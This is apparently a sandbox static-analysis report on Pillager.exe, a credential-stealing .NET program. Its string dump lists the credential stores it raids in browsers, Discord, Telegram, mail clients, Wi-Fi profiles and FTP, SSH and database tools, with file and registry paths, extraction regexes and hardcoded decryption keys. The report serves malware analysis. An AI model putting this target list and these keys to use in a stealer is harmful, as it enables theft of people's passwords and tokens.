Static | ZeroBOX

PE Compile Time

2039-03-21 03:40:56

PDB Path

D:\a\Pillager\Pillager\Pillager\obj\Release\Pillager.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy
.text | 0x00002000 | 0x00020714 | 0x00020800 | 5.97980051909
.rsrc | 0x00024000 | 0x000005ac | 0x00000600 | 4.0609853064
.reloc | 0x00026000 | 0x0000000c | 0x00000200 | 0.101910425663

Resources

Name | Offset | Size | Language | Sub-language | File type
RT_VERSION | 0x00024090 | 0x0000031c | LANG_NEUTRAL | SUBLANG_NEUTRAL | data
RT_MANIFEST | 0x000243bc | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
v2.0.50727
#Strings
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=20
1213DCCBA29EDDA390350D7BAB8C5E29515A6949F1D668C3C3125BDE5F114A50
E348FD3C79BAE72850626B7DF613E6210E9BFEE17841F32B1CCB4C576CBE5280
FA1AD270B23BA640E88EE7F51CC9C0C1A6C6BB1F2B9025682A7D30FB3BDA64F0
<>9__1_0
<EncryptInitalize>b__1_0
<StringToByteArray>b__1_0
<>c__DisplayClass1_0
<>9__32_0
<SetA>b__32_0
<>c__DisplayClass2_0
<IE_passwords>g__GetVaultElementValue|3_0
<>9__54_0
<ParseValue>b__54_0
<>c__DisplayClass4_0
<>9__0
<DecryptWithoutMP>b__0
<GetArr>b__0
<EncryptOutput>b__0
D38F1F4A152CEB94D7366FB851BD64D0C557CD57A0486E57BFB5926A910D5111
HMACSHA1
<>9__1
<DecryptWithoutMP>b__1
<StringToByteArray>b__1
<>c__DisplayClass31_0`1
<>c__32`1
IEnumerable`1
Predicate`1
Action`1
IEnumerator`1
List`1
<>7__wrap1
<>m__Finally1
__StaticArrayInitTypeSize=32
kernel32
Microsoft.Win32
ReadUInt32
ReadInt32
ToInt32
__StaticArrayInitTypeSize=72
39D3523C2701B843470935A44285EB7ECA57D0AD93B65C106443CC46BA3B70F2
DecryptV2
Func`2
KeyValuePair`2
Dictionary`2
Pbkdf2
<>7__wrap2
<>m__Finally2
ToUInt64
ReadInt64
ToInt64
<line>5__4
32D08A08F1E0B79A994ED903C36A7956E36F1C99D68FDB67460ACAAC83CA9C06
__StaticArrayInitTypeSize=16
ReadUInt16
ToUInt16
ReadInt16
HMACSHA256
__StaticArrayInitTypeSize=4096
__StaticArrayInitTypeSize=6
4644D25C296EA1EDD5CA2B89F2032ACB2831E8D6D2BB65F379E56AE3E993AD27
<Lines>d__57
VAULT_ITEM_WIN7
VaultGetItem_WIN7
499F259249758EA3145B591255CD757DCEE6AEA1698483E9DEBC966C58CC1EE8
get_UTF8
EncodeUTF8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
337E14160109F30E3844660DB943B9794D8911CE199D337317AAACA366B591D9
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<Module>
<PrivateImplementationDetails>
7B898A2E22E9A17153213DEBB16D4ED2B7E97240F8E4E407942526A0BB86DB0A
PROCESS_SET_QUOTA
BCRYPT_KEY_DATA_BLOB
DecryptCBC
EncryptCBC
BCRYPT_KEY_DATA_BLOB_MAGIC
PW_MAGIC
PROCESS_CREATE_THREAD
PROCESS_VM_READ
VAULT_SCHEMA_ELEMENT_ID
ProcessID
GetRawID
MozillaPBE
GetIntBE
PutIntBE
BCRYPT_CHAINING_MODE
PROCESS_DUP_HANDLE
LARGE_PRIME
SMALL_PRIME
PROCESS_SUSPEND_RESUME
POOL_TYPE
VAULT_ELEMENT_TYPE
PROCESS_TERMINATE
PROCESS_VM_WRITE
SYNCHRONIZE
BLOCK_SIZE
F18366628A466F286AC60A27D59CADD5FD347730C9D55E04CE70FFDA96CB236F
B9E288FA0365803938930D9782FBBFA1DC34E6629F6956B71C4AFA87CD69D08F
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
PW_FLAG
GENERIC_MAPPING
UNICODE_STRING
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
get_ASCII
FromINI
GetINI
IO_STATUS_BLOCK
SECURITY_IMPERSONATION_LEVEL
get_formSubmitURL
set_formSubmitURL
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
PROCESS_QUERY_LIMITED_INFORMATION
CNST_SYSTEM_HANDLE_INFORMATION
OBJECT_TYPE_INFORMATION
PROCESS_SET_INFORMATION
PROCESS_QUERY_INFORMATION
PROCESS_VM_OPERATION
DEFAULT_SECTION
loginJSON
TortoiseSVN
WLAN_INTERFACE_INFO
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
WLAN_PROFILE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
DecryptNextCharacterWinSCP
BCRYPT_PAD_OAEP
DecryptWithMP
DecryptWithoutMP
CoreFTP
SessionP
MS_PRIMITIVE_PROVIDER
decryptMoz3DES
PROCESS_ACCESS_FLAGS
FILE_INFORMATION_CLASS
OBJECT_INFORMATION_CLASS
DUPLICATE_SAME_ACCESS
PROCESS_ALL_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
PROCESS_CREATE_PROCESS
BCRYPT_PAD_PSS
NonPagedPoolCacheAlignedMustS
VAULT_ITEM_ELEMENT
SecureCRT
WLAN_INTERFACE_INFO_LIST
WLAN_PROFILE_INFO_LIST
get_IV
set_IV
get_partIV
set_partIV
value__
FileZilla
Enigma
get_Data
set_Data
cbData
ProtectedData
encryptedData
cbAuthData
pbAuthData
DecryptData
mscorlib
System.Collections.Generic
NeteaseCloudMusic
AddStreamAsync
FromFileTimeUtc
get_Id
SchemaId
schemaId
pszAlgId
dwProcessId
SchemaElementId
GenericRead
nNumberOfBytesToRead
lpNumberOfBytesRead
get_everSynced
set_everSynced
NonPagedPoolMustSucceed
SHA1Managed
SHA256Managed
RijndaelManaged
AesManaged
get_timePasswordChanged
set_timePasswordChanged
LastModified
Interlocked
NonPagedPoolCacheAligned
Undefined
lpOverlapped
SecurityRequired
get_timesUsed
set_timesUsed
get_timeLastUsed
set_timeLastUsed
defaultSectionLowerCased
get_timeCreated
set_timeCreated
encrypted
pReserved
pPackageSid
get_id
set_id
row_id
InterfaceGuid
interfaceGuid
vaultGuid
get_guid
set_guid
get_passwordField
set_passwordField
get_usernameField
set_usernameField
<formSubmitURL>k__BackingField
<IV>k__BackingField
<partIV>k__BackingField
<Data>k__BackingField
<everSynced>k__BackingField
<timePasswordChanged>k__BackingField
<timesUsed>k__BackingField
<timeLastUsed>k__BackingField
<timeCreated>k__BackingField
<id>k__BackingField
<guid>k__BackingField
<passwordField>k__BackingField
<usernameField>k__BackingField
<encryptedPassword>k__BackingField
<MasterPassword>k__BackingField
<BrowserName>k__BackingField
<encryptedUsername>k__BackingField
<hostname>k__BackingField
<Type>k__BackingField
<encType>k__BackingField
<BrowserPath>k__BackingField
<Algorithm>k__BackingField
<httpRealm>k__BackingField
<syncCounter>k__BackingField
<encryptedUnknownFields>k__BackingField
<profiles>k__BackingField
<objects>k__BackingField
<Lenght>k__BackingField
<Salt>k__BackingField
<GlobalSalt>k__BackingField
<EntrySalt>k__BackingField
<IterationCount>k__BackingField
<cipherText>k__BackingField
<Key>k__BackingField
<MasterKey>k__BackingField
GetField
record_header_field
ReadToEnd
AppEnd
Append
get_Second
InvokeMethod
dwMoveMethod
_method
MailBird
passWord
WriteEndRecord
WriteCentralDirRecord
Discord
DecryptWinSCPPassword
get_encryptedPassword
set_encryptedPassword
get_MasterPassword
set_MasterPassword
masterPassword
DecryptPassword
password
DecryptPwd
passwd
Replace
IsWhiteSpace
IdentityReference
Sequence
cbNonce
pbNonce
MatchDataSource
_source
Resource
VSCode
set_Mode
FileMode
dwShareMode
PaddingMode
chainingMode
CryptoStreamMode
CompressionMode
CipherMode
XmlNode
desDecode
get_Unicode
get_BigEndianUnicode
FromImage
CentralDirImage
TotalHandleTableUsage
HighWaterHandleTableUsage
TotalPagedPoolUsage
TotalNonPagedPoolUsage
HighWaterNonPagedPoolUsage
HighWaterPagedPoolUsage
TotalNamePoolUsage
HighWaterNamePoolUsage
get_Message
GetMessage
CompareExchange
Snowflake
Invoke
CrcTable
ReadTable
ReadMasterTable
GetEnvironmentVariable
Enumerable
IDisposable
Double
RuntimeFieldHandle
hSourceHandle
GetFileHandle
fileHandle
RuntimeTypeHandle
WlanCloseHandle
DuplicateHandle
GetTypeFromHandle
DuplicateTokenHandle
ExistingTokenHandle
WlanOpenHandle
pHandle
hSourceProcessHandle
GetProcessHandle
hTargetProcessHandle
processHandle
ObjectHandle
lpTargetHandle
bInheritHandle
vaultHandle
hClientHandle
clientHandle
Rectangle
ParseRDGFile
ReadFile
AddFile
ReadLockedFile
CreateFile
hTemplateFile
ReadConfigFile
ParseLoginFile
NtQueryInformationFile
WlanGetProfile
get_MainModule
ProcessModule
DecryptSSH1Style
EncryptSSH1Style
FTPName
get_Name
TableName
get_FileName
lpFileName
GetTempFileName
GetFileName
GetProcessIDByFileName
FindHandleByFileName
DuplicateHandleByFileName
strProfileName
profileName
get_MachineName
SoftwareName
baseName
valueName
MailName
get_FullName
ToolName
get_UserDomainName
sectionName
SystemInfoName
MessengerName
get_UserName
GetProcessUserName
userName
get_BrowserName
set_BrowserName
get_ProcessName
TryGetName
GetProcessesByName
pszCredentialFriendlyName
GetDirectoryName
astable_name
item_name
NormalizedFilename
_filename
_pathname
get_encryptedUsername
set_encryptedUsername
username
get_hostname
set_hostname
_modTime
ToFileTime
DateTime
GetLastWriteTime
CreationTime
DateTimeToDosTime
AccessTime
ModifyTime
Chrome
ReadLine
AppendLine
WriteLine
AddIniLine
ReplaceIniLine
newIniLine
get_NewLine
Combine
LocalMachine
Escape
DataProtectionScope
get_Type
set_Type
pszBlobType
get_encType
set_encType
LineType
ValueType
PoolType
DontUseThisType
ObjectType
GetType
item_type
IniListContainstype
FileShare
Compare
SetProcessDPIAware
System.Core
PtrToStructure
get_InvariantCulture
Capture
passphrase
System.IDisposable.Dispose
dataToParse
TryParse
Reverse
Create
Delegate
Deflate
ExpandState
InitializeState
<>1__state
Delete
GenericWrite
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
HandleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GenericExecute
get_Minute
Compute
ReadByte
ToByte
DESCBCDecryptorByte
get_Value
ParseValue
TryGetValue
SetValue
DecryptValue
ParseKeyValue
recursive
Native
lDistanceToMove
Remove
Pillager.exe
get_Size
cbSize
CompressedSize
FileSize
SQLDataTypeSize
MaxAuthTagSize
get_HashSize
set_FeedbackSize
set_BlockSize
chunkSize
HeaderSize
set_KeySize
Initialize
EncryptInitalize
page_size
Resize
PadToMultipleOf
SizeOf
LastIndexOf
BcryptPbkdf
srcOff
destOff
RevertToSelf
authTag
get_Jpeg
config
JavaRng
System.Threading
set_Padding
GetEncoding
DefaultEncoding
encoding
System.Drawing.Imaging
Ceiling
add_LogWarning
remove_LogWarning
FireLogWarning
GenericMapping
FromBase64String
ToBase64String
LoadFromString
ToString
GetString
OctetString
BitString
DecryptString
hexString
Substring
ForceDeflating
System.Drawing
nextLong
SQLyog
IsMatch
lpDistanceToMoveHigh
get_Hash
ComputeHash
BcryptHash
Blowfish
blowfish
RDGPath
GetDataPath
filePath
GetInstallPath
loginsJsonPath
GetTempPath
GetAppDataFolderPath
SHGetFolderPath
MessengerPath
get_BrowserPath
set_BrowserPath
rootPath
pszPath
savepath
get_Width
get_Length
NameLength
MaximumLength
SystemInformationLength
ObjectInformationLength
returnLength
SetLength
length
EndsWith
StartsWith
get_Month
PtrToStringUni
Pixini
Wlanapi
FlushFinalBlock
TransformFinalBlock
TransformBlock
pInfoBlock
IoStatusBlock
get_CanSeek
DingTalk
GrabOutlook
AccessMask
defaultVal
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
cbLabel
pbLabel
System.ComponentModel
Foxmail
GenericAll
SaveAll
advapi32.dll
kernel32.dll
shell32.dll
user32.dll
vaultcli.dll
Wlanapi.dll
wlanapi.dll
ntdll.dll
bcrypt.dll
FinalShell
System.Xml
LoadXml
profileXml
NonPagedPool
AddStream
ZipFileStream
DeflateStream
CryptoStream
MemoryStream
_stream
Telegram
Program
AesGcm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
get_Algorithm
set_Algorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
get_httpRealm
set_httpRealm
CanConvertFrom
MobaXterm
ICryptoTransform
browserOnChromium
root_num
row_num
RDCMan
Boolean
IsLittleEndian
inputLen
CopyFromScreen
SetThreadToken
DuplicateToken
hToken
ImpersonateProcessToken
OpenProcessToken
GetToken
keylen
_leaveOpen
SeekOrigin
GetFileNameWithoutExtension
get_OSVersion
get_Version
pdwNegotiatedVersion
dwInfoVersion
dwClientVersion
System.IO.Compression
FileEaInformation
FileFullEaInformation
FileQuotaInformation
FileBasicInformation
ObjectBasicInformation
FileObjectIdInformation
FileStandardInformation
FileModeInformation
FileIoStatusBlockRangeInformation
systemHandleInformation
ObjectHandleInformation
FileEndOfFileInformation
FileProcessIdsUsingFileInformation
fileInformation
FileNormalizedNameInformation
FileNameInformation
FileAlternateNameInformation
FileNetworkPhysicalNameInformation
ObjectNameInformation
FileShortNameInformation
FileRenameInformation
FileSfioVolumeInformation
FilePipeInformation
ObjectTypeInformation
FilePipeRemoteInformation
FileSfioReserveInformation
FileAttributeTagInformation
FileTrackingInformation
FileValidDataLengthInformation
FileHardLinkInformation
FileLinkInformation
FilePipeLocalInformation
FileInternalInformation
FileAllInformation
FileStreamInformation
NtQuerySystemInformation
FileMaximumInformation
FileNetworkOpenInformation
FileCompressionInformation
FileIoCompletionNotificationInformation
FileAllocationInformation
FileCompletionInformation
FilePositionInformation
FileDispositionInformation
FileMoveClusterInformation
FileNamesInformation
ObjectAllTypesInformation
FileAccessInformation
ObjectInformation
FileMailslotSetInformation
FileAlignmentInformation
FileIoPriorityHintInformation
FileReparsePointInformation
FileMailslotQueryInformation
FileDirectoryInformation
FileIdBothDirectoryInformation
FileBothDirectoryInformation
FileIdFullDirectoryInformation
FileFullDirectoryInformation
CopyPixelOperation
pszImplementation
System.Globalization
ParseSection
DeleteSection
HandleDefaultSection
currentSection
System.Reflection
MatchCollection
GroupCollection
ManagementObjectCollection
KeyCollection
section
get_Position
set_Position
dwCreationDisposition
SearchOption
CryptographicException
NotSupportedException
DirectoryNotFoundException
ArgumentOutOfRangeException
ArgumentNullException
InvalidOperationException
ArgumentException
strInterfaceDescription
StringComparison
CompareTo
CopyTo
CreateExtraInfo
FieldInfo
InterfaceInfo
ReadFileInfo
ProfileInfo
GetLineInfo
CultureInfo
pPaddingInfo
FileSystemInfo
ConnectionInfo
GetInfo
DirectoryInfo
PropertyInfo
sectionMap
Bitmap
FilenameInZip
_filenameInZip
_pathnameInZip
TimeStamp
get_Top
InstalledApp
System.Linq
get_qq
get_Year
ToChar
DirectorySeparatorChar
CountChar
quotechar
Asn1Der
lineNumber
WriteLocalHeader
StringReader
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
SHA512CryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
provider
StringBuilder
SpecialFolder
nFolder
GetCommonDocumentsFolder
structureOrder
lpBuffer
buffer
Pillager
Xmanager
ConvertToInteger
ManagementObjectSearcher
Navicat11Cipher
blowfishCipher
ObjectIdentifier
SecurityIdentifier
SQLiteHandler
hwndOwner
Pillager.Helper
TripleDESHelper
ToUpper
ZipStorer
get_User
AllUser
CurrentUser
KeyCrafter
StreamWriter
TextWriter
BinaryWriter
Object_Pointer
SetFilePointer
get_syncCounter
set_syncCounter
TypeConverter
GetConverter
BitConverter
converter
MailMaster
DBeaver
ToLower
sourceDir
destinationDir
BlockXor
get_Major
get_Minor
add_LogError
remove_LogError
FireLogError
Authenticator
inputKVSeparator
outputKVSeparator
IndexOfKvSeparator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
TypeDescriptor
DESCBCDecryptor
CreateDecryptor
CreateEncryptor
GetArr
passwordVaultPtr
ReadIntPtr
vaultElementPtr
get_Hour
Pillager.FTPs
Graphics
System.Diagnostics
get_encryptedUnknownFields
set_encryptedUnknownFields
get_Bounds
rounds
Methods
IE_passwords
Chrome_passwords
FireFox_passwords
WlanEnumInterfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
sources
DebuggingModes
SelectNodes
Matches
Chrome_cookies
Skype_cookies
Sogou_cookies
FireFox_cookies
GetDirectories
master_table_entries
TotalNumberOfHandles
HighWaterNumberOfHandles
GetHandles
GetAllAccessibleFiles
ExistingFiles
sessionFiles
GetFiles
get_profiles
set_profiles
NumberStyles
GetTableNames
GetValueNames
get_SectionNames
GetSubKeyNames
field_names
ReadAllLines
WriteAllLines
Pillager.Softwares
Sesspasses
GetProcesses
InvalidAttributes
dwFlagsAndAttributes
lpSecurityAttributes
encryptedBytes
FindBytes
ReadAllBytes
WriteAllBytes
plainBytes
BufferBytes
XorBytes
GetBytes
RightBytes
db_bytes
UpdateCrcAndSizes
ProfileFLags
WlanProfileFlags
dwFlags
DiscordPaths
MessengerPaths
sessionpaths
<>4__this
IE_books
Chrome_books
FireFox_books
Equals
Pillager.Mails
Pillager.Tools
VaultEnumerateItems
dwNumberOfItems
dwNumberofItems
ParseLoginItems
System.Windows.Forms
get_AllScreens
Contains
decryptLogins
StringExtensions
Chrome_extensions
DecryptSessions
System.Text.RegularExpressions
iterations
emptyLinesBetweenSections
System.Collections
InvokeMethodOptions
dwOptions
RegexOptions
Pillager.SystemInfos
get_Groups
get_Chars
Pillager.Messengers
RuntimeHelpers
Pillager.Browsers
GetMethodParameters
emptyLinesBetweenKeyValuePairs
decodePass
remainingPass
rawPass
SystemInformationClass
ObjectInformationClass
sha2pass
dwDesiredAccess
pdwGrantedAccess
ValidAccess
FileAccess
get_Success
IsWow64Process
wow64Process
NtSuspendProcess
NtResumeProcess
hProcess
OpenProcess
GetCurrentProcess
PostProcess
TotalNumberOfObjects
HighWaterNumberOfObjects
get_objects
set_objects
VaultEnumerateVaults
clients
pPropertyElements
emptyLineAboveComments
get_Exists
SectionExists
saveBackupOfPrevious
Status
arrays
get_Keys
RemoveAt
Navicat
Concat
Repeat
AppendFormat
ImageFormat
PixelFormat
Subtract
ManagementBaseObject
hObject
Asn1DerObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
Select
Unprotect
iniStruct
System.Collections.IEnumerator.Reset
FileOffset
ReadTableFromOffset
inOffset
HeaderOffset
outOffset
inputOffset
outputOffset
d_offset
s_offset
get_Left
get_Height
get_Lenght
set_Lenght
op_Explicit
get_Salt
set_Salt
cbSalt
get_GlobalSalt
set_GlobalSalt
get_EntrySalt
set_EntrySalt
sha2salt
VaultOpenVault
get_Default
pcbResult
UnsignedInt
GetBytesFromInt
nextInt
mailClient
smptClient
System.Management
pResourceElement
pAuthenticatorElement
pIdentityElement
sql_statement
ParseLineComment
_comment
Environment
XmlDocument
GetParent
System.Collections.Generic.IEnumerator<System.String>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<System.String>.get_Current
System.Collections.IEnumerator.get_Current
GetCurrent
<>2__current
content
get_Count
MaintainHandleCount
vaultItemCount
get_IterationCount
set_IterationCount
dwPropertiesCount
vaultCount
GetRowCount
ScreenShot
RC4Crypt
Bcrypt
AESDecrypt
OldDecrypt
BlockDecrypt
BCryptDecrypt
NewDecrypt
AESEncrypt
BlockEncrypt
TrimStart
AppStart
Insert
Convert
UnsignedShort
ppInterfaceList
XmlNodeList
ppProfileList
WlanGetProfileList
profileList
MaintainTypeList
GetSectionList
ToList
pathlist
cbInput
pbInput
cbOutput
pbOutput
EncryptOutput
output
MoveNext
System.Text
ReadAllText
WriteAllText
_bcryptCipherText
get_cipherText
set_cipherText
get_InnerText
cbMacContext
pbMacContext
Ciphertext
ciphertext
OldSogou
keyHex
BufferEndIndex
endIndex
FindIndex
CreatorBackTrackIndex
BlockIndex
BufferStartIndex
startIndex
dwIndex
GetKeyIndex
fromhex
FireFox
blowfish_pbox
blowfish_sbox
get_Day
ProtectedArray
ConvertHexStringToByteArray
InitializeArray
ToArray
ToCharArray
get_IsArray
ivArray
keyArray
GroupPolicy
get_Key
set_Key
OpenSubKey
jdbcKey
privateKey
InitializeKey
ranDomKey
CustomUserKey
get_MasterKey
set_MasterKey
GetMasterKey
ContainsKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
System.Security.Cryptography
Multiply
BlockCopy
ObjectQuery
SelectQuery
AddDirectory
CreateDirectory
CopyDirectory
IE_history
Chrome_history
Sogou_history
FireFox_history
ZipFileEntry
table_entry
sqlite_master_entry
GetInfoFromRegistry
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
WrapNonExceptionThrows
Pillager
Copyright
2023
$2dfb5bea-c5b3-4639-8d37-b6149d665eca
1.0.0.0
D:\a\Pillager\Pillager\Pillager\obj\Release\Pillager.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Pillager
system
explorer
\"(?<key>[^"]+)\"\s*:\s*\{\s*\"#connection\"\s*:\s*\{\s*\"user\"\s*:\s*\"(?<user>[^"]+)\"\s*,\s*\"password\"\s*:\s*\"(?<password>[^"]+)\"\s*\}\s*\}
password
username:
password:
)":\s*{[^}]+?"url":\s*"([^"]+)"[^}]+?}
host:
DBeaverData\workspace6\General\.dbeaver\data-sources.json
DBeaverData\workspace6\General\.dbeaver\credentials-config.json
babb4a9f774ab853c96c2d653dfe544a
00000000000000000000000000000000
DBeaver
\finalshell\conn
_connect_config.json
"user_name":"(.*?)"
"password":"(.*?)"
"host":"(.*?)"
"port":(.*?),
port:
user_name:
FinalShell
bound must be positive
SessionP
Sesspass
passwords
credentials
Passwords:
Credentials:
SOFTWARE\Mobatek\MobaXterm
MobaXterm.ini
MobaXterm\MobaXterm.ini
0d5e9n1348/U2+67
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
MobaXterm
Navicat
NavicatMSSQL
SQL Server
NavicatOra
Oracle
NavicatPG
NavicatMARIADB
MariaDB
NavicatMONGODB
MongoDB
NavicatSQLite
SQLite
Software\PremiumSoft\
\Servers
DatabaseName:
UserName
ConnectName:
hostname:
Software\PremiumSoft
\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
//FilesToOpen
//server
profileName
userName
domain
profilename:
decrypted:
RDCMan
Software\VanDyke\SecureCRT
Config Path
Sessions
__FolderData__.ini
S:"Password"
S:"Password"=
S:"Password V2"
S:"Password V2"=
SecureCRT
Password
Isencrypted
SQLyog\sqlyog.ini
sqlyog.ini
sqlyog_decrypted.ini
SQLyog
Subversion\auth\svn.simple
passtype
wincrypt
svn.simple.decrypted
TortoiseSVN
Session File:
Version:
Host:
UserName:
rawPass:
Version=(.*)
Host=(.*)
UserName=(.*)
Password=(.*)
!X@s#h$e%l^l&
Decrypt rawPass:
Xmanager
Netease\CloudMusic\info
userinfo.url
[InternetShortcut]
URL=https://music.163.com/#/user/home?id=
NeteaseCloudMusic
Code\User\History
History
VSCode
Software\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
Windows
InstalledApp
ScreenShot
Found
SSIDs:
============================
//*[name()='WLANProfile']/*[name()='SSIDConfig']/*[name()='SSID']/*[name()='name']
//*[name()='WLANProfile']/*[name()='MSM']/*[name()='security']/*[name()='sharedKey']/*[name()='keyMaterial']
SSID:
Password:
----------------------------
DingTalk\globalStorage\storage.db
DingTalk\globalStorage\storage.db-shm
DingTalk\globalStorage\storage.db-wal
storage.db
storage.db-shm
storage.db-wal
DingTalk
Local State
"encrypted_key":"(.*?)"
Local Storage\leveldb
dQw4w9WgXcQ:([^.*\['(.*)'\].*$][^"]*)
token.txt
Discord
Discord PTB
DiscordPTB
Discord Canary
DiscordCanary
sticker
SOFTWARE\Enigma\Enigma
device_id
device_id.txt
Enigma
Enigma\Enigma
Data/Line.ini
Line.ini
Computer Name =
User Name =
infp.txt
Tencent\QQ\UserDataInfo.ini
UserDataSavePathType
UserDataSet
Tencent Files
UserDataSavePath
All Users
\\.\Pipe\
\\.\Pipe\QQ_
All QQ number:
Online QQ number:
QQ.txt
Network\Cookies
cookies
host_key
skypetoken_asm
{skypetoken}={
_Desktop.txt
_Store.txt
Microsoft\Skype for Desktop
Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\Roaming\Microsoft\Skype for Store
Telegram
tdata_
\tdata_
\D877F783D5D3EF8C
\A7FDF864FBC10B77
\F8806DD0C461824F
\C2B05980D9127787
\0CA814316818D8F6
Telegram Desktop
tdata\key_datas
tdata\D877F783D5D3EF8Cs
tdata\D877F783D5D3EF8C\configs
tdata\D877F783D5D3EF8C\maps
tdata\A7FDF864FBC10B77s
tdata\A7FDF864FBC10B77\configs
tdata\A7FDF864FBC10B77\maps
tdata\F8806DD0C461824Fs
tdata\F8806DD0C461824F\configs
tdata\F8806DD0C461824F\maps
tdata\C2B05980D9127787s
tdata\C2B05980D9127787\configs
tdata\C2B05980D9127787\maps
tdata\0CA814316818D8F6s
tdata\0CA814316818D8F6\configs
tdata\0CA814316818D8F6\maps
SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Foxmail.exe
Storage
Accounts
\Accounts
FMStorage.list
Foxmail
Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
Server_Host:
Username:
Password:
OAuth2Credentials
AuthorizedAccountId
AccessToken
AuthorizedAccountId:
AccessToken:
MailBird
Netease\MailMaster\data\app.db
Account
DataPath
Netease\MailMaster\data
MailMaster
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{0}: {1}
result.txt
Outlook
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Native.BCryptDecrypt() (get size) failed with status code: {0}
Native.BCryptDecrypt(): authentication tag mismatch
Native.BCryptDecrypt() failed with status code:{0}
Native.BCryptOpenAlgorithmProvider() failed with status code:{0}
Native.BCryptSetAlgorithmProperty(Native.BCRYPT_CHAINING_MODE, Native.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}
Native.BCryptImportKey() failed with status code:{0}
Native.BCryptGetProperty() (get size) failed with status code:{0}
Native.BCryptGetProperty() failed with status code:{0}
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
OxychromaticBlowfishSwatDynamite
3DC5CA39
default
[line {0}] WARN: {1}
[line {0}] ERR: {1}
Key names can't contain spaces. {0} was truncated to {1}
{0}{1}{4}{2}{4} ;{3}
{0}{1}{2} ;{3}
{0}{1}{3}{2}{3}
{0}{1}{2}
Source directory not found:
Select * from Win32_Process WHERE processID=
GetOwner
SYSTEM
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
algorithm
Algorithm cannot be null.
Password cannot be null.
Salt cannot be null.
Derived key too long.
Writing is not alowed
Writing is not allowed
SQLite format 3
Not a valid SQLite 3 Database File
Auto-vacuum capable database is not supported
UNIQUE
Software\FTPWare\CoreFTP\Sites
Server:
{0}:{1}
hdfzpysvpzimorhk
The binary key cannot have an odd number of digits: {0}
CoreFTP
FileZilla\recentservers.xml
FileZilla
USERPROFILE
snowflake-ssh\session-store.json
session-store.json
Snowflake
0123456789ABCDEF
Software\Martin Prikryl\WinSCP 2\Sessions
